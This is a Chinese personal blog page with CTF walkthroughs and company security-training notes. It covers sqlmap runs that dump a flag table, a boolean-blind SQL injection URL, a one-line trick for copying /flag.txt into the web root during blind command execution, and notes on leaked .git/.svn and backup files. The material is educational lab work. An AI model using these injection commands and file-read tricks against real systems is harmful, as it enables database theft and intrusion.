    <a class="article-category-link" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a>
  </div>
   
    </div>
      
    <div class="article-entry" itemprop="articleBody">
       
  <hr>
<p>1，打开Burp软件，并打开自带浏览器，或者设置本地浏览器代理到Burp里面。</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210417133026.png" alt="image-20210417133019502"></p>
<p>2，打开浏览器之后，在Burp上打开拦截。然后进到需要注入的网址地址，并输入数据后访问</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210417133433.png" alt="image-20210417133433660"></p>
<p>3，然后将登录请求数据保存到文件（就直接保存到 sqlmap工具目录里面 ，命名为：sq.txt）</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210417133528.png" alt="image-20210417133528828"></p>
<p>4，进入sqlmap工具目录命令行运行： </p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -t 4 --batch -r sq.txt -p name pass --current-db</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210417134242.png" alt="image-20210417134242157"></p>
<ul>
<li>-t 4  表示4个线程运行</li>
<li>–batch 表示自动选择参数</li>
<li>-r sq.txt  表示读取文件sq.txt(就是上面Burp软件抓取的登录请求数据，因为是直接保存到sqlmap工具目录里面的，所以不需要再加其他路径，直接使用文件名)</li>
<li>-p name pass 表示登录请求的参数，就是<img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210417134746.png" alt="image-20210417134746758"></li>
<li>–current-db 表示跑当前注入的系统的数据库名</li>
</ul>
<p>5，运行之后找到的结果，就是当前系统的数据库</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[13:37:55] [INFO] adjusting time delay to 1 second due to good response <span class="built_in">times</span></span><br><span class="line">note</span><br><span class="line">current database: <span class="string">'note'</span></span><br></pre></td></tr></table></figure>

<p>6，接着运行，跑出该数据库的表</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -t 4 --batch -r sq.txt -p name pass -D note --tables</span><br></pre></td></tr></table></figure>

<ul>
<li>-D note  表示选择note这个数据库</li>
</ul>
<p>7，得到该数据库的表</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210417134504.png" alt="image-20210417134504301"></p>
<p>8，得到表名：fl4g，users，猜测我们要找的flag就在fl4g表里面，然后就跑该表的列数据</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -t 4 --batch -r sq.txt -p name pass -D note -T fl4g --columns</span><br></pre></td></tr></table></figure>

<ul>
<li>-T fl4g  表示选择fl4g这个表</li>
</ul>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210417135246.png" alt="image-20210417135246625"></p>
<p>9，根据列名跑出数据：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -t 4 --batch -r sq.txt -p name pass -D note -T fl4g -C <span class="string">"flag"</span> --dump</span><br></pre></td></tr></table></figure>

<ul>
<li>-C “flag” 表示选择flag这列数据</li>
<li>–dump  表示跑出该列的所有数据</li>
</ul>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210417135627.png" alt="image-20210417135627865"></p>
<p>最终找到我们的flag为：n1book{login_sqli_is_nice}</p>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%AE%89%E5%85%A8/" rel="tag">安全</a></li></ul>

    </footer>
  </div>

    
 
   
</article>

    
    <article
  id="post-2021省公司网络安全培训（三）"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h2 itemprop="name">
  <a class="article-title" href="/2021/03/10/2021%E7%9C%81%E5%85%AC%E5%8F%B8%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD%EF%BC%88%E4%B8%89%EF%BC%89/"
    >2021省公司网络安全培训-第三天</a> 
</h2>
 

    </header>
     
    <div class="article-meta">
      <a href="/2021/03/10/2021%E7%9C%81%E5%85%AC%E5%8F%B8%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD%EF%BC%88%E4%B8%89%EF%BC%89/" class="article-date">
  <time datetime="2021-03-10T07:40:08.000Z" itemprop="datePublished">2021-03-10</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%88%86%E7%B1%BB%E5%90%8D%E7%A7%B0/">分类名称</a>
  </div>
   
    </div>
      
    <div class="article-entry" itemprop="articleBody">
       
  <p><strong>远程命令执行无回显的解决方案之一</strong></p>
<p> 通过cat 命令读取目标文件，然后重定向文件到web目录（需求知道web目录路径）</p>
<p>E:    </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat &#x2F;flag.txt &gt;&gt; &#x2F;var&#x2F;www&#x2F;html</span><br></pre></td></tr></table></figure>

 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%A0%87%E7%AD%BE%E5%90%8D/" rel="tag">标签名</a></li></ul>

    </footer>
  </div>

    
 
   
</article>

    
    <article
  id="post-2021省公司网络安全培训（二）"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h2 itemprop="name">
  <a class="article-title" href="/2021/03/10/2021%E7%9C%81%E5%85%AC%E5%8F%B8%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD%EF%BC%88%E4%BA%8C%EF%BC%89/"
    >2021省公司网络安全培训-第二天</a> 
</h2>
 

    </header>
     
    <div class="article-meta">
      <a href="/2021/03/10/2021%E7%9C%81%E5%85%AC%E5%8F%B8%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD%EF%BC%88%E4%BA%8C%EF%BC%89/" class="article-date">
  <time datetime="2021-03-10T07:39:46.000Z" itemprop="datePublished">2021-03-10</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%9F%B9%E8%AE%AD/">培训</a>
  </div>
   
    </div>
      
    <div class="article-entry" itemprop="articleBody">
       
  <p> 一、  任意文件读取漏洞</p>
<h3 id="1-Php"><a href="#1-Php" class="headerlink" title="1.  Php"></a>1.  Php</h3><p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195512.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195515.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195518.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195521.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195533.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195536.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195501.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195501.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195501.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195501.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195501.jpg" alt="img"></p>
<h2 id="二、-PHP黑魔法"><a href="#二、-PHP黑魔法" class="headerlink" title="二、  PHP黑魔法"></a>二、  PHP黑魔法</h2><p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195501.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195635.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195639.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195643.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195646.png" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311195650.jpg" alt="img"></p>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%AE%89%E5%85%A8/" rel="tag">安全</a></li></ul>

    </footer>
  </div>

    
 
   
</article>

    
    <article
  id="post-2021省公司网络安全培训（一）"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h2 itemprop="name">
  <a class="article-title" href="/2021/03/09/2021%E7%9C%81%E5%85%AC%E5%8F%B8%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD%EF%BC%88%E4%B8%80%EF%BC%89/"
    >2021省公司网络安全培训-第一天</a> 
</h2>
 

    </header>
     
    <div class="article-meta">
      <a href="/2021/03/09/2021%E7%9C%81%E5%85%AC%E5%8F%B8%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD%EF%BC%88%E4%B8%80%EF%BC%89/" class="article-date">
  <time datetime="2021-03-09T01:32:00.000Z" itemprop="datePublished">2021-03-09</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%9F%B9%E8%AE%AD/">培训</a>
  </div>
   
    </div>
      
    <div class="article-entry" itemprop="articleBody">
       
  <h2 id="一、-环境配置"><a href="#一、-环境配置" class="headerlink" title="一、  环境配置"></a>一、  环境配置</h2><h3 id="a-Python环境配置"><a href="#a-Python环境配置" class="headerlink" title="a)  Python环境配置"></a>a)  Python环境配置</h3><h3 id="b-Java环境配置（可选，工具里面自带）"><a href="#b-Java环境配置（可选，工具里面自带）" class="headerlink" title="b)  Java环境配置（可选，工具里面自带）"></a>b)  Java环境配置（可选，工具里面自带）</h3><h3 id="c"><a href="#c" class="headerlink" title="c)"></a>c)</h3><h2 id="二、-CTF介绍"><a href="#二、-CTF介绍" class="headerlink" title="二、  CTF介绍"></a>二、  CTF介绍</h2><h3 id="a-CTF："><a href="#a-CTF：" class="headerlink" title="a)  CTF："></a>a)  CTF：</h3><p>夺旗（英语：Capture the flag，CTF）是一种西方传统运动。此游戏进行方式是由两队人马互相前往对方的基地夺旗，每队人马必须把敌方的旗从敌方的基地带回自己队伍的基地。后来，“夺旗”的概念也被引入信息安全攻防比赛。因为在比赛中，选手需要通过解开题目，或攻破目标夺得“Flag”。 在1996 年 DEFCON 全球黑客大会首次举办CTF比赛，是网络安全爱好者之间的竞技游戏。CTF 竞赛涉及众多领域，内容繁杂</p>
<h3 id="b-分类"><a href="#b-分类" class="headerlink" title="b)  分类"></a>b)  分类</h3><p><strong>1.</strong>     <strong>WEB：</strong></p>
<p>在 CTF 竞赛中，WEB 也是占比重很大的一个方向之一，WEB 类的题目种类繁多，知识点细碎，时效性强，能紧跟时下热点漏洞，贴近实战。WEB 类的题目包括但不限于：SQL 注入、XSS 跨站脚本、CSRF 跨站请求伪造、文件上传、文件包含、框架安全、PHP 常见漏洞、代码审计等。</p>
<p><strong>2.</strong>     <strong>Reverse：</strong></p>
<p>软件代码逆向主要指对软件的结流程，算法，代码等进行逆向拆解和分析。主要应用于软件维护，软件破解，漏洞挖掘，恶意代码分析。涉及 Windows、Linux、Android 平台的多种编程技术，要求利用常用工具对源代码及二进制文件进行逆向分析，掌握 Android 移动应用 APK 文件的逆向分析，掌握加解密、内核编程、算法、反调试和代码混淆技术。</p>
<p><strong>3.</strong>     <strong>Crypto：</strong></p>
<p>密码学（Cryptography）一般可分为古典密码学和现代密码学。其中，古典密码学，作为一种实用性艺术存在，其编码和破译通常依赖于设计者和敌手的创造力与技巧，并没有对密码学原件进行清晰的定义。而现代密码学则起源于 20 世纪中后期出现的大量相关理论，1949 年香农（C. E. Shannon）发表了题为《保密系统的通信理论》的经典论文标志着现代密码学的开始。</p>
<p><strong>4.</strong>     <strong>Pwn：</strong></p>
<p>pwn，在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。主要手段有缓冲区溢出、格式化字符串溢出、栈溢出、堆溢出等漏洞，通过对以上漏洞利用而达到获取系统的权限。</p>
<p><strong>5.</strong>     <strong>Msic：</strong></p>
<p>Misc（Miscellaneous），即杂项，一般指CTF中无法分类在Web、PWN、Crypto、Reverse中的题目。当然，少数CTF比赛也存在额外分类，但Misc是一个各种各样的形式题目的大杂烩。</p>
<h3 id="c-信息收集"><a href="#c-信息收集" class="headerlink" title="c)  信息收集"></a>c)  信息收集</h3><p>在现实世界和比赛中，信息搜集是前期的必备工作，也是重中之重。在CTF线上比赛的Web类题目中，信息搜集涵盖的面非常广，有备份文件、目录信息、Banner信息等，这就需要参赛者有丰富的经验，或者利用一些脚本来帮助自己发现题目信息、挖掘题目漏洞。本节会尽可能叙述在CTF线上比赛中Web类题目包含的信息搜集，也会推荐一些开源工具软件。因为信息搜集大部分是工具的使用（git泄露可能涉及git命令的应用），所以本章可能不会有太多的技术细节。同时，因为信息搜集的种类比较多，本节会尽可能地涵盖，如有不足之处还望理解；最后会通过实际例子来体现信息搜集的重要性。</p>
<p><strong>1.</strong>     <strong>敏感目录泄露</strong></p>
<p>​             <strong>i.</strong>  <strong>Git泄露：git是一个主流的分布式版本控制系统，开发人员在开发过程中经常会遗忘.git文件夹，导致攻击者可以通过.git文件夹中的信息获取开发人员提交过的所有源码，进而可能导致服务器被攻击而沦陷。</strong></p>
<p>​             <strong>ii.</strong>  <strong>SVN泄露：SVN（subversion）是源代码版本管理软件，造成SVN源代码漏洞的主要原因是管理员操作不规范将SVN隐藏文件夹暴露于外网环境，可以利用.svn/entries或wc.db文件获取服务器源码等信息。</strong></p>
<p>​            <strong>iii.</strong>  <strong>HG泄露：在使用HG作为代码编辑和管理工具时，在初始化项目时，HG会在当前文件夹下创建一个.hg隐藏文件夹，其中包含代码和分支修改记录等信息。</strong></p>
<p><strong>总结：不论是.git这些隐藏文件，还是实战中的admin之类的敏感后台文件夹，其关键在于字典的强大，读者可以在某些工具的基础上进行二次开发，以满足自己需要。这里推荐一个开源的目录扫描工具：<a href="https://github.com/maurosoria/dirsearch。CTF线上比赛往往会有重定向一类问题。例如，只要访问.git，便会返回403，此时试探着访问.git/config，如果有文件内容返回，就说明存在git泄露，反之，一般不存在。而在SVN泄露中，一般是在entries中爬取源代码，但有时会出现entries为空的情况，这时注意wc.db文件存在与否，便可通过其中的checksum在pristine文件夹中获取源代码" target="_blank" rel="noopener">https://github.com/maurosoria/dirsearch。CTF线上比赛往往会有重定向一类问题。例如，只要访问.git，便会返回403，此时试探着访问.git/config，如果有文件内容返回，就说明存在git泄露，反之，一般不存在。而在SVN泄露中，一般是在entries中爬取源代码，但有时会出现entries为空的情况，这时注意wc.db文件存在与否，便可通过其中的checksum在pristine文件夹中获取源代码</a></strong></p>
<p><strong>2.</strong>     <strong>敏感备份文件泄露</strong></p>
<p>​             <strong>i.</strong>  <strong>gedit备份文件：在Linux下，用gedit编辑器保存后，当前目录下会生成一个后缀为“～”的文件，其文件内容就是刚编辑的内容。假设刚才保存的文件名为flag，则该文件名为flag～。通过浏览器访问这个带有“～”的文件，便可以得到源代码。</strong></p>
<p>​             <strong>ii.</strong>  <strong>Vim备份文件：vim是目前运用得最多的Linux编辑器，当用户在编辑文件但意外退出时（如通过SSH连接到服务器时，在用vim编辑文件的过程中可能遇到因为网速不够导致的命令行卡死而意外退出的情况），会在当前目录下生成一个备份文件，该文件用来备份缓冲区中的内容即退出时的文件内容，针对SWP备份文件，我们可以用“vim-r”命令恢复文件的内容。</strong></p>
<p>​            <strong>iii.</strong>  <strong>常规文件：常规文件所依靠的无非就是字典的饱和性，不论是CTF比赛中还是现实世界中，我们都会碰到一些经典的有辨识的文件，从而让我们更好地了解网站。<br> 以下为一些简单的例子：<br> robots.txt：         记录一些目录和CMS版本信息。<br> readme.md：        记录CMS版本信息，有的甚至有Github地址。<br> <a href="http://www.zip/rar/tar.gz：" target="_blank" rel="noopener">www.zip/rar/tar.gz：</a> 往往是网站的源码备份</strong></p>
<p><strong>总结：在CTF线上比赛的过程中，有时候备份文件为题目的提示，有些时候出题人往往会在线运维题目，有时会因为各种情况导致SWP备份文件的生成，所以在比赛过程中可以编写实时监控脚本，对题目服务进行监控。vim在第一次意外退出时生成的备份文件为*.swp，第二次意外退出时的为*.swo，第三次退出时的为*.swn，以此类推。vim的官方手册中还有*.un.文件名.swp类型的备份文件。另外，在实际环境中，网站的备份往往可能是网站域名的压缩</strong></p>
<p><strong>3.</strong>     <strong>Banner识别</strong></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311194020.jpeg" alt=""></p>
<p><strong>4.</strong>     <strong>SQL注入</strong></p>
<p>SQL注入是开发者对用户输入的参数过滤不严格，导致用户输入的数据能够影响预设查询功能的一种技术，通常将导致数据库的原有信息泄露、篡改，甚至被删除。本节用一些简单的例子详细介绍SQL注入的基础，包括数字型注入、UNION注入、字符型注入、布尔盲注、时间注入、报错注入和堆叠注入等注入方式和对应的利用技巧。</p>
<p>​             <strong>i.</strong>  <strong>数字型注入和UNION注入：</strong></p>
<p>通过网页访问链接<a href="http://192.168.20.133/sql1.php" target="_blank" rel="noopener">http://192.168.20.133/sql1.php</a>？id=1，结果见图。页面显示的内容与表中的第一行id为1的结果一致。事实上，PHP将GET方法传入的id=1与前面的SQL查询语句进行了拼接。原查询语句如下：</p>
<p>$res = mysqli_querry($conn, “SELECT title , content, FROM wp_news WHERE id “.$_GET[‘id’]); </p>
<p>收到请求<a href="http://192.168.20.133/sql1.php？id=1的$_GET[&#39;id&#39;]被赋值为1，最后传给MySQL的查询语句如下：" target="_blank" rel="noopener">http://192.168.20.133/sql1.php？id=1的$_GET[&#39;id&#39;]被赋值为1，最后传给MySQL的查询语句如下：</a></p>
<p>SELECT title，content, FROM wp_news WHERE id = 1</p>
<p>我们直接在MySQL中查询也能得到相同的结果，现在互联网上绝大多数网站的内容是预先存储在数据库中，通过用户传入的id等参数，从数据库的数据中查询对应记录，再显示在浏览器中，如<a href="http://berkeleyrecycling.org/page.php?id=1中的“1’" target="_blank" rel="noopener">http://berkeleyrecycling.org/page.php?id=1中的“1’</a></p>
<p>通常把使用UNION语句将数据展示到页面上的注入办法称为UNION（联合查询）注入。</p>
<p>MySQL 5.0版本后，默认自带一个数据库information_schema，MySQL的所有数据库名、表名、字段名都可以从中查询到。虽然引入这个库是为了方便数据库信息的查询，但客观上大大方便了SQL注入的利用。</p>
<p>table_name字段是information_schema库的tables表的表名字段。表中还有数据库名字段table_schema。而database()函数返回的内容是当前数据库的名称，group_concat是用“，”联合多行记录的函数。也就是说，该语句可以联合查询当前库的所有（事实上有一定的长度限制）表名并显示在一个字段中。</p>
<p>数字型注入的关键在于找到输入的参数点，然后通过加、减、乘除等运算，判断出输入参数附近没有引号包裹，再通过一些通用的攻击手段，获取数据库的敏感信息。</p>
<p>​             <strong>ii.</strong>  <strong>字符型注入和布尔盲注</strong></p>
<p>在MySQL中，等号两边如果类型不一致，则会发生强制转换。当数字与字符串数据比较时，字符串将被转换为数字，再进行比较。按照这个特性，我们容易判断输入点是否为字符型，也就是是否有引号（可能是单引号也可能是双引号，绝大多数情况下是单引号）包裹。</p>
<p>关键字WHERE是SELECT操作的一个判断条件，之前的id=1即查询条件。这里，AND代表需要同时满足两个条件，一个是id=1，另一个是‘1’。由于字符串‘1’被强制转换成True，代表这个条件成立，因此数据库查询出id=1的记录。虽然我们看不到直接的数据，但是可以通过注入推测出数据，这种技术被称为布尔盲注。那么，这种情况下如何获得数据呢？我们可以猜测数据。例如，先试探这个数据是否为’a’，如果是，则页面显示id=1的回显，否则页面显示空白；再试探这个数据是否为’b’，如果数据只有1位，那么只要把可见字符都试一遍就能猜到。假设被猜测的字符是’f’，访问<a href="http://192.168.20.133/sql2.php？id=1&#39;and&#39;f&#39;=&#39;a&#39;，猜测为&#39;a&#39;，没有猜中，于是尝试&#39;b&#39;、&#39;c&#39;、&#39;d&#39;、&#39;e&#39;，都没有猜中，直到尝试&#39;f&#39;的时候，猜中了，于是页面回显了id=1的内容" target="_blank" rel="noopener">http://192.168.20.133/sql2.php？id=1&#39;and&#39;f&#39;=&#39;a&#39;，猜测为&#39;a&#39;，没有猜中，于是尝试&#39;b&#39;、&#39;c&#39;、&#39;d&#39;、&#39;e&#39;，都没有猜中，直到尝试&#39;f&#39;的时候，猜中了，于是页面回显了id=1的内容</a></p>
<p>在盲注过程中，根据页面回显的不同来判断布尔盲注比较常见，除此之外，还有一类盲注方式。由于某些情况下，页面回显的内容完全一致，故需要借助其他手段对SQL注入的执行结果进行判断，如通过服务器执行SQL语句所需要的时间。在执行的语句中，由于sleep（1）的存在，使整个语句在执行时需要等待1秒，导致执行该查询需要至少1秒的时间。通过修改sleep()函数中的参数，我们可以延时更长，来保证是注入导致的延时，而不是业务正常处理导致的延时。与回显的盲注的直观结果不同，通过sleep()函数，利用IF条件函数或AND、OR函数的短路特性和SQL执行的时间判断SQL攻击的结果，这种注入的方式被称为时间盲注。其本质与布尔盲注类似，故具体利用方式不再赘述。</p>
<p>​            <strong>iii.</strong>  <strong>报错注入：</strong></p>
<p>有时为了方便开发者调试，有的网站会开启错误调试信息。此时，只要触发SQL语句的错误，即可在页面上看到错误信息。这种攻击方式则是因为MySQL会将语句执行后的报错信息输出，故称为报错注入。通过查阅相关文档可知，updatexml在执行时，第二个参数应该为合法的XPATH路径，否则会在引发报错的同时将传入的参数进行输出，利用这个特征，针对存在报错显示，将我们想得到的信息传入，就可以触发错误获取我们想要的数据。另外，当目标开启多语句执行的时候，可以采用多语句执行的方式修改数据库的任意结构和数据，这种特殊的注入情况被称为堆叠注入。</p>
<p>​            <strong>iv.</strong>  <strong>总结：</strong></p>
<p>本节讲述了数字型注入、UNION注入、布尔盲注、时间盲注、报错注入，这些是在后续注入中需要用到的基础。根据获取数据的便利性，这些注入技巧的使用优先级是：UNION注入&gt;报错注入&gt;布尔盲注&gt;时间盲注。</p>
<p>堆叠注入不在排序范围内，因为其通常需要结合其他技巧使用才能获取数据。</p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311194011.jpg" alt="img"></p>
<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311194014.jpg" alt="img"></p>
<h2 id="三、-工具介绍"><a href="#三、-工具介绍" class="headerlink" title="三、  工具介绍"></a>三、  工具介绍</h2><h3 id="1-BurpSuite："><a href="#1-BurpSuite：" class="headerlink" title="1.  BurpSuite："></a>1.  BurpSuite：</h3><p>是用于攻击web 应用程序的集成平台，包含了许多工具。Burp Suite为这些工具设计了许多接口，以加快攻击应用程序的过程。所有工具都共享一个请求，并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。</p>
<h3 id="2-DirSearch：目录扫描工具"><a href="#2-DirSearch：目录扫描工具" class="headerlink" title="2.  DirSearch：目录扫描工具"></a>2.  DirSearch：目录扫描工具</h3><h3 id="3-Sqlmap：自动SQL注入工具"><a href="#3-Sqlmap：自动SQL注入工具" class="headerlink" title="3.  Sqlmap：自动SQL注入工具"></a>3.  Sqlmap：自动SQL注入工具</h3><h2 id="四、-上手实战"><a href="#四、-上手实战" class="headerlink" title="四、  上手实战"></a>四、  上手实战</h2><h3 id="1-SQL注入："><a href="#1-SQL注入：" class="headerlink" title="1.  SQL注入："></a>1.  SQL注入：</h3><p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311194004.jpg" alt="img"></p>
<p>第一步：利用sqlmap自动注入工具寻找注入点和注入类型</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;139.186.146.65:20259&#x2F;index.php?id&#x3D;1&quot; --batch</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311193959.jpg" alt="img"></p>
<p>发现注入点：参数id；类型有布尔盲注，时间盲注，联合注入方式</p>
<p>第二步：继续进行数据库扫描</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;139.186.146.65:20259&#x2F;index.php?id&#x3D;1&quot; –batch –dbs</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311193951.jpg" alt="img"></p>
<p>发现有几个数据库，猜测当前系统数据库是“note”。</p>
<p>第三步：选择数据库note，进行数据表扫描</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;139.186.146.65:20259&#x2F;index.php?id&#x3D;1&quot; --batch -D note –tables</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311193937.png" alt="image-20210311193937109"></p>
<p>扫描得到数据表有fl4g和notes，我们flag肯定就在fl4g里面。</p>
<p>第四步就是扫描数据表列数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;139.186.146.65:20259&#x2F;index.php?id&#x3D;1&quot; --batch -D note -T fl4g --columns</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311193907.png" alt="image-20210311193906922"></p>
<p>得到列数据</p>
<p>最后一步扫描数据表内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http:&#x2F;&#x2F;139.186.146.65:20259&#x2F;index.php?id&#x3D;1&quot; --batch -D note -T fl4g -C fllllag --dump</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/wycisme/imageBed/raw/master/img/20210311193827.png" alt="image-20210311193827262"></p>
<p>得到flag =》 n1book{union_select_is_so_cool}</p>
<h3 id="2-SQL注入2："><a href="#2-SQL注入2：" class="headerlink" title="2.  SQL注入2："></a>2.  SQL注入2：</h3><p>Post表单提交方式的登录，将登录请求数据抓取并导出到文本文件，然后使用sqlmap工具扫描注入点</p>
<p>Sqlmap.py -r “导出的请求数据文件” –batch</p>
<p>得到有注入点信息及注入类型，说明可以进行sql注入，接下来进行数据库扫描</p>
<p>Sqlmap.py -r “导出的请求数据文件” –batch –dbs</p>
<p>得到数据库，猜测一个数据库进行扫描</p>
<p>Sqlmap.py -r “导出的请求数据文件” –batch –D 猜测的数据库 –tables</p>
<p>得到该数据库的数据表，选择一个数据表扫描其列字段</p>
<p>Sqlmap.py -r “导出的请求数据文件” –batch –D 猜测的数据库 –T 猜测的数据表 –columns</p>
<p>最后选择列字段进行数据扫描，最终得到结果</p>
<p>Sqlmap.py -r “导出的请求数据文件” –batch –D 猜测的数据库 –T 猜测的数据表 –C 猜测的数据列名 –dump</p>
<h2 id="练习地："><a href="#练习地：" class="headerlink" title="练习地："></a>练习地：</h2><h3 id="https-buuoj-cn"><a href="#https-buuoj-cn" class="headerlink" title="https://buuoj.cn/"></a><a href="https://buuoj.cn/" target="_blank" rel="noopener">https://buuoj.cn/</a></h3><h3 id="https-www-ctfhub-com-index"><a href="#https-www-ctfhub-com-index" class="headerlink" title="https://www.ctfhub.com/#/index"></a><a href="https://www.ctfhub.com/#/index" target="_blank" rel="noopener">https://www.ctfhub.com/#/index</a></h3><h3 id="https-wiki-x10sec-org"><a href="#https-wiki-x10sec-org" class="headerlink" title="https://wiki.x10sec.org/"></a><a href="https://wiki.x10sec.org/" target="_blank" rel="noopener">https://wiki.x10sec.org/</a></h3><h2 id=""><a href="#" class="headerlink" title=""></a></h2> 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%AE%89%E5%85%A8/" rel="tag">安全</a></li></ul>

    </footer>
  </div>

    
 
   
</article>

    
    <article
  id="post-CentOS防火墙常用操作"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h2 itemprop="name">
  <a class="article-title" href="/2020/09/02/CentOS%E9%98%B2%E7%81%AB%E5%A2%99%E5%B8%B8%E7%94%A8%E6%93%8D%E4%BD%9C/"
    >CentOS防火墙常用操作</a> 
</h2>
 

    </header>
     
    <div class="article-meta">
      <a href="/2020/09/02/CentOS%E9%98%B2%E7%81%AB%E5%A2%99%E5%B8%B8%E7%94%A8%E6%93%8D%E4%BD%9C/" class="article-date">
  <time datetime="2020-09-02T01:34:41.000Z" itemprop="datePublished">2020-09-02</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a>
  </div>
   
    </div>
      
